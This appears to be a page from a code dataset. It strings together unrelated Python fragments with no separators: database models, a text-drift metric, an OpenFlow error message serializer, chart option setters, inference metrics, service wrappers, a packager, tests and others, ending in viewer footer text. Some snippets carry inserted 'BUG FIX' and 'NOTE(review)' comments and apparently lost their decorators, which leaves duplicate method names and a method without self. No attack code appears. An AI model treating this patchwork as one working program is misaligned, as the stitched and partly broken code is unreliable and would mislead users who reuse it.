    recipient_suffix = db.Column('suffix', db.String)
    beneficiary_committee_name = db.Column('ben_comname', db.String)
    # Disbursement details.
    disbursement_type = db.Column('dis_code', db.String)
    disbursement_description = db.Column('transdesc', db.String)
    disbursement_date = db.Column('date_dis', db.Date)
    disbursement_amount = db.Column('amount', db.Numeric(30, 2))
    semi_annual_bundled_refund = db.Column('refund', db.Integer)
    candidate_office = db.Column('can_off', db.String)
    candidate_office_district = db.Column('can_dist', db.String)
    # Joined relationships; join conditions are expressed as raw primaryjoin
    # strings because they involve expressions, not plain FKs.
    filing = db.relationship('EFilings', primaryjoin='and_(\n ScheduleBEfile.file_number == EFilings.file_number,\n )', foreign_keys=file_number, lazy='joined')
    committee = db.relationship('CommitteeHistory', primaryjoin="and_(\n ScheduleBEfile.committee_id == CommitteeHistory.committee_id,\n extract('year', ScheduleBEfile.load_timestamp) +cast(extract('year',\n ScheduleBEfile.load_timestamp), Integer) % 2 == CommitteeHistory.cycle,\n )", foreign_keys=committee_id, lazy='joined')
class TextDescriptorsDriftMetric(Metric[TextDescriptorsDriftMetricResults]):
    """Data-drift metric over auto-generated descriptors of one text column.

    For the configured text column, a set of descriptor features (text
    length, non-letter share, out-of-vocabulary share, ...) is generated for
    both reference and current data; drift is evaluated per descriptor and
    aggregated into a dataset-level verdict.
    """
    column_name: str
    stattest: Optional[PossibleStatTestType] = None
    stattest_threshold: Optional[float] = None
    descriptors: Dict[(str, FeatureDescriptor)]
    _drift_options: DataDriftOptions
    _generated_text_features: Dict[(str, GeneratedFeature)]

    def __init__(self, column_name: str, descriptors: Optional[Dict[(str, FeatureDescriptor)]]=None, stattest: Optional[PossibleStatTestType]=None, stattest_threshold: Optional[float]=None, options: AnyOptions=None):
        """Configure the metric for *column_name* with optional descriptors and stat test."""
        self.column_name = column_name
        if descriptors:
            self.descriptors = descriptors
        else:
            # Default descriptor set when the caller supplies none.
            self.descriptors = {'Text Length': TextLength(), 'Non Letter Character %': NonLetterCharacterPercentage(), 'OOV %': OOV()}
        super().__init__(stattest=stattest, stattest_threshold=stattest_threshold, options=options)
        self._generated_text_features = {}
        self._drift_options = DataDriftOptions(all_features_stattest=stattest, all_features_threshold=stattest_threshold)

    @property
    def generated_text_features(self):
        """Descriptor name -> generated feature mapping (populated by required_features).

        Fix: restored as a property — the rest of the class accesses it as an
        attribute (``self.generated_text_features.values()`` / ``.keys()``),
        which would raise AttributeError on a bound method.
        """
        return self._generated_text_features

    def required_features(self, data_definition: DataDefinition):
        """Generate descriptor features when the target column is of text type."""
        column_type = data_definition.get_column(self.column_name).column_type
        if (column_type == ColumnType_data.Text):
            self._generated_text_features = {name: desc.feature(self.column_name) for (name, desc) in self.descriptors.items()}
            return list(self.generated_text_features.values())
        return []

    def get_parameters(self) -> tuple:
        """Identity parameters for caching/deduplication of metric instances."""
        return (self.column_name, self._drift_options)

    def calculate(self, data: InputData) -> TextDescriptorsDriftMetricResults:
        """Compute per-descriptor drift and the aggregate dataset-drift verdict.

        Raises:
            ValueError: when no reference dataset is provided.
        """
        if (data.reference_data is None):
            raise ValueError('Reference dataset should be present')
        # Aggregate rendering unless raw-data rendering was requested.
        if self.get_options().render_options.raw_data:
            agg_data = False
        else:
            agg_data = True
        # Assemble one column per generated descriptor for both datasets.
        curr_text_df = pd.concat([data.get_current_column(x.feature_name()) for x in list(self.generated_text_features.values())], axis=1)
        curr_text_df.columns = list(self.generated_text_features.keys())
        ref_text_df = pd.concat([data.get_reference_column(x.feature_name()) for x in list(self.generated_text_features.values())], axis=1)
        ref_text_df.columns = list(self.generated_text_features.keys())
        # All generated descriptors are treated as numerical features.
        text_dataset_columns = process_columns(ref_text_df, ColumnMapping(numerical_features=ref_text_df.columns))
        drift_by_columns: Dict[(str, ColumnDataDriftMetrics)] = {}
        for col in curr_text_df.columns:
            drift_by_columns[col] = get_one_column_drift(current_data=curr_text_df, reference_data=ref_text_df, column_name=col, options=self._drift_options, dataset_columns=text_dataset_columns, agg_data=agg_data)
        dataset_drift = get_dataset_drift(drift_by_columns, 0)
        return TextDescriptorsDriftMetricResults(number_of_columns=curr_text_df.shape[1], number_of_drifted_columns=dataset_drift.number_of_drifted_columns, share_of_drifted_columns=dataset_drift.dataset_drift_score, dataset_drift=dataset_drift.dataset_drift, drift_by_columns=drift_by_columns, dataset_columns=text_dataset_columns)
class bad_instruction_error_msg(error_msg):
    """OpenFlow v5 (1.4) error message of type OFPET_BAD_INSTRUCTION.

    Generated-style serializer/deserializer for the error frame carrying a
    bad-instruction error code and opaque payload data.

    NOTE(review): string-based packing (``self.data = ''``, ``''.join``)
    suggests Python-2-era bytes handling — confirm before running on Py3.
    """
    version = 5    # OpenFlow protocol version
    type = 1       # message type: error
    err_type = 3   # error type: bad instruction

    def __init__(self, xid=None, code=None, data=None):
        """Initialize from transaction id, error code and payload data."""
        if (xid != None):
            self.xid = xid
        else:
            self.xid = None
        if (code != None):
            self.code = code
        else:
            self.code = 0
        if (data != None):
            self.data = data
        else:
            self.data = ''
        return

    def pack(self):
        """Serialize to wire format.

        The length field (parts index 2) is first packed as 0 and
        back-patched once the total message length is known.
        """
        packed = []
        packed.append(struct.pack('!B', self.version))
        packed.append(struct.pack('!B', self.type))
        packed.append(struct.pack('!H', 0))  # placeholder for total length
        packed.append(struct.pack('!L', self.xid))
        packed.append(struct.pack('!H', self.err_type))
        packed.append(struct.pack('!H', self.code))
        packed.append(self.data)
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack('!H', length)  # back-patch real length
        return ''.join(packed)

    def unpack(reader):
        """Parse one message from *reader* and return a new instance.

        NOTE(review): defined without ``self`` — presumably a
        ``@staticmethod`` in the generated original (decorators appear
        stripped from this file); confirm.
        """
        obj = bad_instruction_error_msg()
        _version = reader.read('!B')[0]
        assert (_version == 5)
        _type = reader.read('!B')[0]
        assert (_type == 1)
        _length = reader.read('!H')[0]
        orig_reader = reader
        # Constrain further reads to this message's declared length
        # (4 header bytes already consumed).
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read('!L')[0]
        _err_type = reader.read('!H')[0]
        assert (_err_type == 3)
        obj.code = reader.read('!H')[0]
        obj.data = str(reader.read_all())
        return obj

    def __eq__(self, other):
        """Field-wise equality on xid, code and data (exact type must match)."""
        if (type(self) != type(other)):
            return False
        if (self.xid != other.xid):
            return False
        if (self.code != other.code):
            return False
        if (self.data != other.data):
            return False
        return True

    def pretty_print(self, q):
        """Write a human-readable rendering of this message to printer *q*."""
        q.text('bad_instruction_error_msg {')
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text('xid = ')
                if (self.xid != None):
                    q.text(('%#x' % self.xid))
                else:
                    q.text('None')
                q.text(',')
                q.breakable()
                q.text('code = ')
                # Symbolic names for the OFPBIC_* error codes.
                value_name_map = {0: 'OFPBIC_UNKNOWN_INST', 1: 'OFPBIC_UNSUP_INST', 2: 'OFPBIC_BAD_TABLE_ID', 3: 'OFPBIC_UNSUP_METADATA', 4: 'OFPBIC_UNSUP_METADATA_MASK', 5: 'OFPBIC_BAD_EXPERIMENTER', 6: 'OFPBIC_BAD_EXPERIMENTER_TYPE', 7: 'OFPBIC_BAD_LEN', 8: 'OFPBIC_EPERM', 9: 'OFPBIC_DUP_INST'}
                if (self.code in value_name_map):
                    q.text(('%s(%d)' % (value_name_map[self.code], self.code)))
                else:
                    q.text(('%#x' % self.code))
                q.text(',')
                q.breakable()
                q.text('data = ')
                q.pp(self.data)
            # assumes the closing breakable/'}' sit at group level, per the
            # conventional generated layout — TODO confirm (indentation was
            # lost in this copy of the file).
            q.breakable()
        q.text('}')
class CoprPermission(db.Model, helpers.Serializer):
    """Association row linking a user to a copr with per-role permission levels."""
    # Permission level for building in the copr (0 means no permission).
    copr_builder = db.Column(db.SmallInteger, default=0)
    # Permission level for administering the copr (0 means no permission).
    copr_admin = db.Column(db.SmallInteger, default=0)
    # Composite primary key: (user, copr).
    user_id = db.Column(db.Integer, db.ForeignKey('user.id'), primary_key=True)
    user = db.relationship('User', backref=db.backref('copr_permissions_unfiltered'))
    copr_id = db.Column(db.Integer, db.ForeignKey('copr.id'), primary_key=True, index=True)
    copr = db.relationship('Copr', backref=db.backref('copr_permissions'))

    def set_permission(self, name, value):
        """Set permission *name* ('admin' or 'builder') to *value*.

        Raises:
            KeyError: for an unknown permission name.
        """
        if (name == 'admin'):
            self.copr_admin = value
        elif (name == 'builder'):
            self.copr_builder = value
        else:
            raise KeyError('{0} is not a valid copr permission'.format(name))

    def get_permission(self, name):
        """Return permission *name*, normalizing NULL columns to 0.

        Raises:
            KeyError: for an unknown permission name.
        """
        if (name == 'admin'):
            return (0 if (self.copr_admin is None) else self.copr_admin)
        if (name == 'builder'):
            return (0 if (self.copr_builder is None) else self.copr_builder)
        raise KeyError('{0} is not a valid copr permission'.format(name))
class OptionSeriesArcdiagramStatesHoverMarker(Options):
    """Options wrapper for arc-diagram series hover-state marker settings.

    NOTE(review): each option below appears as TWO ``def``s with the same
    name (getter-like then setter-like). As written, the second definition
    shadows the first; these pairs are presumably decorated with
    ``@property`` / ``@<name>.setter`` in the generated original (decorators
    appear stripped from this file) — confirm before relying on the getters.
    """

    def enabled(self):
        # Getter: whether the marker is enabled (default None).
        return self._config_get(None)

    def enabled(self, flag: bool):
        # Setter for enabled.
        self._config(flag, js_type=False)

    def enabledThreshold(self):
        # Getter: point-density threshold below which markers show (default 2).
        return self._config_get(2)

    def enabledThreshold(self, num: float):
        # Setter for enabledThreshold.
        self._config(num, js_type=False)

    def fillColor(self):
        # Getter: marker fill color (default None).
        return self._config_get(None)

    def fillColor(self, text: str):
        # Setter for fillColor.
        self._config(text, js_type=False)

    def height(self):
        # Getter: marker image height (default None).
        return self._config_get(None)

    def height(self, num: float):
        # Setter for height.
        self._config(num, js_type=False)

    def lineColor(self):
        # Getter: marker outline color (default '#ffffff').
        return self._config_get('#ffffff')

    def lineColor(self, text: str):
        # Setter for lineColor.
        self._config(text, js_type=False)

    def lineWidth(self):
        # Getter: marker outline width in px (default 0).
        return self._config_get(0)

    def lineWidth(self, num: float):
        # Setter for lineWidth.
        self._config(num, js_type=False)

    def radius(self):
        # Getter: marker radius in px (default 4).
        return self._config_get(4)

    def radius(self, num: float):
        # Setter for radius.
        self._config(num, js_type=False)

    def width(self):
        # Getter: marker image width (default None).
        return self._config_get(None)

    def width(self, num: float):
        # Setter for width.
        self._config(num, js_type=False)
def _new_metrics_from_model_output(last_metric: ModelInferenceMetrics, is_first_generate: bool, usage: Optional[Dict]=None) -> ModelInferenceMetrics:
    """Derive a fresh ModelInferenceMetrics snapshot from the previous one.

    Copies *last_metric*, bumps the collection index, records first-token /
    first-completion timestamps, merges token counts from *usage* (an
    OpenAI-style dict with prompt_tokens / completion_tokens / total_tokens),
    computes generation speed, and samples current GPU memory.

    :param last_metric: previous snapshot to derive from.
    :param is_first_generate: True on the first streamed output chunk.
    :param usage: optional token-usage payload from the model output.
    :return: the new metrics snapshot.
    """
    metrics = ModelInferenceMetrics.create_metrics(last_metric)
    metrics.collect_index = last_metric.collect_index + 1
    if is_first_generate:
        logger.info(f'is_first_generate, usage: {usage}')
        metrics.first_completion_time_ms = time.time_ns() // 1000000
    # Without a usable usage payload there is nothing more to merge.
    if (not usage) or (not isinstance(usage, dict)):
        return metrics
    prompt_tokens = usage.get('prompt_tokens')
    completion_tokens = usage.get('completion_tokens')
    total_tokens = usage.get('total_tokens')
    # Fall back to counts carried over from the previous snapshot.
    if prompt_tokens is None:
        prompt_tokens = metrics.prompt_tokens
    if completion_tokens is None:
        completion_tokens = metrics.completion_tokens
    if total_tokens is None:
        total_tokens = metrics.total_tokens
    if is_first_generate and (completion_tokens is not None):
        metrics.first_completion_tokens = completion_tokens
        # Exactly one completed token on the first pass means the first
        # token arrived at the first-completion timestamp.
        if completion_tokens == 1:
            metrics.first_token_time_ms = metrics.first_completion_time_ms
    if (not is_first_generate) and (metrics.first_token_time_ms is None) and (completion_tokens == 1):
        metrics.first_token_time_ms = time.time_ns() // 1000000
    if prompt_tokens:
        metrics.prompt_tokens = prompt_tokens
    if completion_tokens:
        metrics.completion_tokens = completion_tokens
    if total_tokens:
        metrics.total_tokens = total_tokens
    elif prompt_tokens and completion_tokens:
        total_tokens = prompt_tokens + completion_tokens
        metrics.total_tokens = total_tokens
    if total_tokens:
        duration = (metrics.current_time_ms - metrics.start_time_ms) / 1000.0
        # BUG FIX: guard the zero-length window (both timestamps within the
        # same millisecond), which previously raised ZeroDivisionError.
        if duration > 0:
            metrics.speed_per_second = total_tokens / duration
    current_gpu_infos = _get_current_cuda_memory()
    metrics.current_gpu_infos = current_gpu_infos
    if not metrics.avg_gpu_infos:
        metrics.avg_gpu_infos = current_gpu_infos
    elif current_gpu_infos:
        # Running average of allocated memory; the other fields just track
        # the latest sample. NOTE(review): assumes avg_gpu_infos and
        # current_gpu_infos describe the same GPUs in the same order —
        # confirm upstream.
        for (i, last_avg) in enumerate(metrics.avg_gpu_infos):
            allocated_memory_gb = (last_avg.allocated_memory_gb * (metrics.collect_index - 1)) + current_gpu_infos[i].allocated_memory_gb
            metrics.avg_gpu_infos[i].allocated_memory_gb = allocated_memory_gb / metrics.collect_index
            metrics.avg_gpu_infos[i].total_memory_gb = current_gpu_infos[i].total_memory_gb
            metrics.avg_gpu_infos[i].cached_memory_gb = current_gpu_infos[i].cached_memory_gb
            metrics.avg_gpu_infos[i].available_memory_gb = current_gpu_infos[i].available_memory_gb
    return metrics
def memoize(func):
    """Decorator caching *func*'s results keyed by its arguments.

    Arguments must be hashable; keyword arguments are order-insensitive.
    The returned wrapper exposes ``cache_clear()`` to empty the cache.
    """
    from functools import wraps

    cache = {}

    # BUG FIX: the original had a stray no-op line `(func)` where
    # @functools.wraps(func) evidently belonged; without it the wrapper
    # hides func's name and docstring.
    @wraps(func)
    def wrapper(*args, **kwargs):
        # frozenset already ignores ordering, so no sort is needed.
        key = (args, frozenset(kwargs.items()))
        try:
            return cache[key]
        except KeyError:
            ret = cache[key] = func(*args, **kwargs)
            return ret

    def cache_clear():
        """Drop every cached entry."""
        cache.clear()

    wrapper.cache_clear = cache_clear
    return wrapper
def run(args, dataset):
    """Benchmark every configuration in *dataset* and print a result table.

    Each dataset entry is (layer_num, input_size, hidden_size, output_size,
    batch_size); run_single is timed and normalized over args.steps steps.
    Columns: per-step latency (s), queries/second, throughput in TFLOP/s.
    """
    print('')
    print(' #Layer Input Hidden Output Batch Time(s)/step QPS Rate(TF/s)')
    print('')
    for (layer_num, input_size, hidden_size, output_size, batch_size) in dataset:
        elap = run_single(args, layer_num, input_size, hidden_size, output_size, batch_size)
        elap /= args.steps
        # FLOPs per step of an MLP: hidden-to-hidden layers plus the input
        # and output projections, times 2 for multiply-accumulate.
        flops = batch_size * (((hidden_size * hidden_size) * layer_num) + (hidden_size * input_size) + (hidden_size * output_size))
        flops *= 2
        QPS = batch_size / elap
        # BUG FIX: the rate column divided by `.0` (i.e. 0.0), which raised
        # ZeroDivisionError; TF/s means FLOP/s scaled down by 1e12.
        print('{0:6}, {1:6}, {2:6}, {3:6}, {4:6}, {5:10.6f}, {6:8.1f}, {7:10.1f}'.format(layer_num, input_size, hidden_size, output_size, batch_size, elap, QPS, (flops / elap) / 1e12))
class SMFCmd(Cmd):
    """Wrappers for SMF (Service Management Facility) service operations.

    Every method delegates to ``self._run_cmd`` with the matching command
    name; the *remote* flag selects execution on a remote host.
    """

    def _service_status(self, fmri, columns=('state',), remote=False):
        """Return the requested status *columns* (comma-joined) for *fmri*."""
        joined_columns = ','.join(columns)
        return self._run_cmd('_service_status', fmri, joined_columns, stderr_to_stdout=True, remote=remote)

    def _service_enable(self, fmri, remote=False):
        """Enable the service instance *fmri*."""
        return self._run_cmd('_service_enable', fmri, remote=remote)

    def _service_disable(self, fmri, remote=False):
        """Disable the service instance *fmri*."""
        return self._run_cmd('_service_disable', fmri, remote=remote)

    def _service_restart(self, fmri, remote=False):
        """Restart the service instance *fmri*."""
        return self._run_cmd('_service_restart', fmri, remote=remote)

    def _service_validate(self, manifest_file, remote=False):
        """Validate the SMF manifest at *manifest_file*."""
        return self._run_cmd('_service_validate', manifest_file, remote=remote)

    def _service_import(self, fmri, manifest_file, remote=False):
        """Import *manifest_file* as service *fmri*."""
        return self._run_cmd('_service_import', fmri, manifest_file, remote=remote)

    def _service_export(self, fmri, remote=False):
        """Export the manifest of service *fmri*."""
        return self._run_cmd('_service_export', fmri, remote=remote)

    def _service_delete(self, fmri, remote=False):
        """Delete service *fmri*."""
        return self._run_cmd('_service_delete', fmri, remote=remote)

    def _service_save(self, fmri, remote=False):
        """Persist the current configuration of service *fmri*."""
        return self._run_cmd('_service_save', fmri, remote=remote)

    def _service_exists(self, fmri, remote=False):
        """Return True when *fmri* resolves to a known service.

        Existence is probed via export; a "no such service" failure maps to
        False, anything else propagates.
        """
        try:
            self._service_export(fmri, remote=remote)
        except CmdError as exc:
            if "doesn't match any service" not in exc.msg:
                raise exc
            return False
        return True

    def _service_instance_import(self, fmri, manifest_file, remote=False):
        """Import *manifest_file* as an instance of service *fmri*."""
        return self._run_cmd('_service_instance_import', fmri, manifest_file, remote=remote)

    def _service_instance_delete(self, fmri, name, remote=False):
        """Delete the instance *name* of service *fmri*."""
        return self._run_cmd('_service_instance_delete', fmri, name, remote=remote)

    def _service_instance_exists(self, fmri, remote=False):
        """Return True when instance *fmri* reports a status.

        A "no such instances" failure maps to False, anything else
        propagates.
        """
        try:
            self._service_status(fmri, remote=remote)
        except CmdError as exc:
            if "doesn't match any instances" not in exc.msg:
                raise exc
            return False
        return True
def package(serializable_entities: typing.List[FlyteControlPlaneEntity], source: str='.', output: str='./flyte-package.tgz', fast: bool=False, deref_symlinks: bool=False):
    """Bundle serialized Flyte entities (and, in fast mode, the source tree)
    into a gzip tarball at *output*.

    :param serializable_entities: entities to persist; must be non-empty.
    :param source: root of the user source tree (fast mode only).
    :param output: path of the resulting .tgz archive.
    :param fast: also include a fast-registration archive of *source*.
    :param deref_symlinks: follow symlinks when building the fast archive.
    :raises NoSerializableEntitiesError: when there is nothing to package.
    """
    if not serializable_entities:
        raise NoSerializableEntitiesError('Nothing to package')
    with tempfile.TemporaryDirectory() as output_tmpdir:
        persist_registrable_entities(serializable_entities, output_tmpdir)
        if fast:
            # A stale archive sitting inside the source tree would get
            # packaged into itself, so remove it before re-creating.
            output_abs = os.path.abspath(output)
            source_abs = os.path.abspath(source)
            if output_abs.startswith(source_abs) and os.path.exists(output):
                click.secho(f'{output} already exists within {source}, deleting and re-creating it', fg='yellow')
                os.remove(output)
            archive_fname = fast_registration.fast_package(source, output_tmpdir, deref_symlinks)
            click.secho(f'Fast mode enabled: compressed archive {archive_fname}', dim=True)
        # Tar up everything staged in the temp dir, rooted at the archive top.
        with tarfile.open(output, 'w:gz') as tar:
            tar.add(output_tmpdir, arcname='')
    click.secho(f'Successfully packaged {len(serializable_entities)} flyte objects into {output}', fg='green')
class IssueReport(object):
    """Appends detected vulnerabilities to a date-stamped CSV report file."""

    def __init__(self):
        # One report file per day; refuse to follow a symlink so a planted
        # link cannot redirect the report to an arbitrary file.
        filename = (('pyfiscan-vulnerabilities-' + time.strftime('%Y-%m-%d')) + '.csv')
        if os.path.islink(filename):
            sys.exit(('CSV-file %s is a symlink. Exiting..' % filename))
        # BUG FIX: the csv module requires files opened with newline='' so
        # the writer controls line endings (avoids blank rows on Windows).
        self.csvfile = open(filename, 'a', newline='')
        os.chmod(filename, (stat.S_IREAD | stat.S_IWRITE))
        # NOTE(review): delimiter and quotechar are both '|' — that yields
        # ambiguous quoting; confirm this is intentional before changing.
        self.writer = csv.writer(self.csvfile, delimiter='|', quotechar='|')

    def close(self):
        """Close the underlying report file if it was opened."""
        if self.csvfile:
            self.csvfile.close()

    def add(self, appname, item, file_version, secure_version, cve):
        """Write one finding row, prefixed with the current timestamp."""
        self.writer.writerow((get_timestamp(), appname, item, file_version, secure_version, cve))
class LmdbDataProvider():
    """Read-only accessor for image / MPI pairs stored in an LMDB database."""

    def __init__(self, path='/mnt/fq_ssd/fq/FOF/lmdb_512') -> None:
        # The environment is opened lazily; call open_db() before reading.
        self.db = None
        self.path = path

    def open_db(self):
        """Open the LMDB environment read-only and without locking."""
        self.db = lmdb.open(self.path, subdir=True, readonly=True, lock=False, readahead=False, meminit=False)

    def get_data_base(self, name, vid, lid):
        """Fetch the encoded image at (name, vid, lid) and the MPI for vid.

        Returns a dict with the decoded image under 'img' and the numpy
        MPI array under 'mpi'.
        """
        mpi_key = ('%s_%03d_mpi' % (name, vid)).encode()
        img_key = ('%s_%03d_%03d' % (name, vid, lid)).encode()
        with self.db.begin(write=False) as txn:
            raw_mpi = txn.get(mpi_key)
            raw_img = txn.get(img_key)
        decoded_img = cv2.imdecode(np.frombuffer(raw_img, np.uint8), -1)
        decoded_mpi = np.load(BytesIO(raw_mpi))
        return {'img': decoded_img, 'mpi': decoded_mpi}
class SearchFilterToManyTests(TestCase):
    """SearchFilter behaviour when search fields span a to-many relation."""

    # BUG FIX: Django invokes this as cls.setUpTestData(), so it must be a
    # classmethod; the undecorated version fails with a TypeError.
    @classmethod
    def setUpTestData(cls):
        # Blog 1: two 1979 Lennon entries. Blog 2: one unrelated 1979 entry
        # and one 1990 Lennon entry — so only Blog 1 matches both terms.
        b1 = Blog.objects.create(name='Blog 1')
        b2 = Blog.objects.create(name='Blog 2')
        Entry.objects.create(blog=b1, headline='Something about Lennon', pub_date=datetime.date(1979, 1, 1))
        Entry.objects.create(blog=b1, headline='Another thing about Lennon', pub_date=datetime.date(1979, 6, 1))
        Entry.objects.create(blog=b2, headline='Something unrelated', pub_date=datetime.date(1979, 1, 1))
        Entry.objects.create(blog=b2, headline='Retrospective on Lennon', pub_date=datetime.date(1990, 6, 1))

    def test_multiple_filter_conditions(self):
        """Comma-separated search terms must all match across related entries."""
        class SearchListView(generics.ListAPIView):
            queryset = Blog.objects.all()
            serializer_class = BlogSerializer
            filter_backends = (filters.SearchFilter,)
            search_fields = ('=name', 'entry__headline', '=entry__pub_date__year')
        view = SearchListView.as_view()
        request = factory.get('/', {'search': 'Lennon,1979'})
        response = view(request)
        assert (len(response.data) == 1)
class TildeSmartProcessor(util.PatternSequenceProcessor):
    """Pattern-sequence processor for "smart" tilde delete/subscript syntax.

    Longer combined patterns are listed first so they win over the simple
    single-token ones.
    """

    PATTERNS = [
        util.PatSeqItem(re.compile(SMART_DEL_SUB, re.DOTALL | re.UNICODE), 'double', 'del,sub'),
        util.PatSeqItem(re.compile(SMART_SUB_DEL, re.DOTALL | re.UNICODE), 'double', 'sub,del'),
        util.PatSeqItem(re.compile(SMART_DEL_SUB2, re.DOTALL | re.UNICODE), 'double', 'del,sub'),
        util.PatSeqItem(re.compile(SMART_DEL, re.DOTALL | re.UNICODE), 'single', 'del'),
        util.PatSeqItem(re.compile(SUB2, re.DOTALL | re.UNICODE), 'single', 'sub', True),
        util.PatSeqItem(re.compile(SUB, re.DOTALL | re.UNICODE), 'single', 'sub'),
    ]
class ModelCard(object):
    """Aggregates model cards from several backends; first hit wins."""

    def __init__(self, config_json=None):
        self.lc = LocalCard(config_json=config_json)
        self.mc = MetadataCard(config_json=config_json)
        self.ac = AirtableCard(config_json=config_json)
        self.rc = ReadmeCard(config_json=config_json)

    def _get(self, model_id):
        # Lookup order: local cache, metadata, airtable, readme.
        for source in (self.lc, self.mc, self.ac, self.rc):
            card = source.get(model_id)
            if card is not None:
                return card
        return None

    def get(self, model_id, as_json=False):
        """Return the first card found for *model_id*.

        Returns None when no backend has it; with as_json=True the card is
        rendered as an indented JSON string instead.
        """
        card = self._get(model_id)
        if card is None:
            return None
        return json.dumps(card, indent=4) if as_json else card
class ServicePlanTestInstanceCollector(Instance):
    """pytest Instance collector that adds fixture-driven service-plan tests."""
    def collect(self):
        """Collect the normal items plus one ServicePlanTestCaseTestFunction
        per fixture-test datum, propagating unittest-level class skips and
        updating the plugin's collected/skipped counters."""
        collected = (super(ServicePlanTestInstanceCollector, self).collect() or [])
        # One synthetic test item per fixture-test datum exposed by the
        # collected object.
        for test_data in self.obj.get_fixture_test_information():
            collected.append(ServicePlanTestCaseTestFunction(parent=self, fixture_test_case_data=test_data))
            PLUGIN_STATISTICS['fixture_tests_collected'] += 1
        # Class-level skip flags set by @unittest.skip on the parent class.
        unittest_skip = getattr(self.parent.obj, '__unittest_skip__', False)
        unittest_skip_why = getattr(self.parent.obj, '__unittest_skip_why__', '')
        for item in collected:
            skipped = False
            # Skipped if the item carries a `skip` marker, or a `skipif`
            # marker whose first condition argument is truthy.
            if any((((m.name == 'skip') or ((m.name == 'skipif') and m.args and m.args[0])) for m in (item.own_markers or []))):
                skipped = True
            elif unittest_skip:
                # Mirror the unittest class-level skip as a pytest marker.
                item.add_marker(pytest.mark.skip(reason=unittest_skip_why))
                skipped = True
            # Only fixture-generated items contribute to the skipped counter.
            if (skipped and isinstance(item, ServicePlanTestCaseTestFunction)):
                PLUGIN_STATISTICS['fixture_tests_skipped'] += 1
        return collected
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.